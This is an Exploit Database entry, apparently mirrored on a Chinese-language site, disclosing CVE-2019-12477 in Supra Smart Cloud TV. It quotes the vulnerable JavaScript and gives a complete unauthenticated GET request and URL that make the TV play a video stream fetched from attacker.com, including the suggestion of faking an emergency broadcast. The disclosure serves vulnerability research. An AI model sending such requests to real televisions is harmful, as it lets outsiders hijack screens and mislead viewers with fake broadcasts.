Supra Smart Cloud TV – ‘openLiveURL()’ Remote File Inclusion

• Exploit Database
• 102 阅读

• 作者： Dhiraj Mishra
  日期： 2019-06-06
• 类别：

  • webapps
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/46971/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60

  Exploit Title: Remote file inclusion # Date: 03-06-2019 # Exploit Author: Dhiraj Mishra # Vendor Homepage: https://supra.ru # Software Link: https://supra.ru/catalog/televizory/televizor_supra_stv_lc40lt0020f/ # CVE: CVE-2019-12477 # References: # https://nvd.nist.gov/vuln/detail/CVE-2019-12477 # https://www.inputzero.io/2019/06/hacking-smart-tv.html   Summary: Supra Smart Cloud TV allows remote file inclusion in the openLiveURL function, which allows a local attacker to broadcast fake video without any authentication via a /remote/media_control?action=setUri&uri=URI   Technical Observation: We are abusing <code>openLiveURL()</code> which allows a local attacker to broadcast video on supra smart cloud TV. I found this vulnerability initially by source code review and then by crawling the application and reading every request helped me to trigger this vulnerability.   Vulnerable code:   function openLiveTV(url) { $.get("/remote/media_control", {m_action:&apos;setUri&apos;,m_uri:url,m_type:&apos;video/*&apos;}, function (data, textStatus){ if("success"==textStatus){ alert(textStatus); }else { alert(textStatus); } }); }   Vulnerable request:   GET /remote/media_control?action=setUri&uri= http://attacker.com/fake_broadcast_message.m3u8 HTTP/1.1 Host: 192.168.1.155 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:66.0) Gecko/20100101 Firefox/66.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1   To trigger the vulnerability you can send a crafted request to the URL,   http://192.168.1.155/remote/media_control?action=setUri&uri=http://attacker.com/fake_broadcast_message.m3u8   Although the above mention URL takes (.m3u8) format based video. We can use curl -v -X GET</code> to send such request, typically this is an unauth remote file inclusion. An attacker could broadcast any video without any authentication, the worst case attacker could leverage this vulnerability to broadcast a fake emergency message.